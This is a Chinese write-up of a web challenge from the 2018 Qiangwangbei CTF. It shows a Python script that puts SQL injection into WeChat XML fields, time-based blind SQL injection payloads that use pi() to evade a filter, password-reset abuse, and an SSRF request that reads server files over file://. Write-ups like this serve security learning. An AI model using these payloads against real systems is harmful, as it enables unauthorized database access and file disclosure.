
出題人給出了公眾后后面的地址,查看微信公眾號的SDK可以發現可以通過一些xml數據進行發送
import requests
url = "http://39.107.33.77/"
content = "Test http://www.baidu.com TEAMKEY icq3be93d38562e68bc0a86368c2d6b2"
data = '''
<xml>
<ToUserName><![CDATA[a]]></ToUserName>
<FromUserName><![CDATA[1',(select content from note limit 3,1))--]]></FromUserName>
<CreateTime>1348831860</CreateTime>
<MsgType><![CDATA[text]]></MsgType>
<Content><![CDATA[%s]]></Content>
<MsgId>1234567890123456</MsgId>
<AgentID>1</AgentID>
</xml>
''' % content
print requests.post(url,data=data).content
通過提示存在注入,可以得到以下信息
<xml>
<ToUserName><![CDATA[1',(select content from note limit 3,1))--]]></ToUserName>
<FromUserName><![CDATA[a]]></FromUserName>
<CreateTime>1521882365</CreateTime>
<MsgType><![CDATA[text]]></MsgType>
<Content><![CDATA[Success!
Start Time:You can leave me message here: http://wc.qwb.com:8088/leave_message.php
Over Time:Sat Mar 24 09:06:05 2018]]></Content>
<MsgId>1234567890123456</MsgId>
</xml>
綁定host: wc.qwb.com 的ip為39.107.33.77
[
]
其中message存在注入,限制的比較嚴格
POST /leave_message.php HTTP/1.1
Host: wc.qwb.com:8088
user=aaaaaaaaaaaaaaa&email=aaaa@qq.com&team=icq3be93d38562e68bc0a86368c2d6b2&message=1'-(sleep(ceil(pi())))-'1&submit=submit
[
]
比如sleep函數參數里面不能用數字,可以使用pi()來繞過,另外就是select from部分。
message=12333'-(if(ascii(substring((select@b:=group_concat(username)from{cl0und.adminuser}),%s,1))like'%s',sleep(pi()),0))-'1
這里字段都需要猜解,猜不到password字段
http://wc.qwb.com:8088/forgetpassword.php
利用密碼找回功能,注入出code,找回管理員密碼
進入后臺后,發現有一段上傳處,主要用于用戶的頭像上傳。
文件上傳后便會將圖片的內容顯示出來。

再往后面看htm中有一段注釋。
[
]
其中urlink存在ssrf漏洞,沒有限制協議以及后面的字符,當然大部分的特殊符號不能用,只能讀取一些配置文件。
POST /getimg.php HTTP/1.1
Host: wc.qwb.com:8088
Cookie: PHPSESSID=cjq7naar02kajivdftljhj2h44
------WebKitFormBoundaryOXFwabnsGhrKdxyn
Content-Disposition: form-data; name="urlink"
file://wc.qwb.com:8088/etc/apache2/apache2.conf
------WebKitFormBoundaryOXFwabnsGhrKdxyn--
讀取到apache的配置文件,可以看到內容。很郁悶,比賽的時候讀取了這個文件,但是base64的內容沒取完整導致沒看到這部分,還是需要細心…
#<Directory /home/qwbweb/backdoor># Port 23333# Options Indexes FollowSymLinks# AllowOverride None# Require all granted# Here is a Bin with its libc#</Directory>
剩下的就是文件讀取pwn程序,然后pwnpwnpwn了,太菜了,不會做。
2018強網杯-Writeup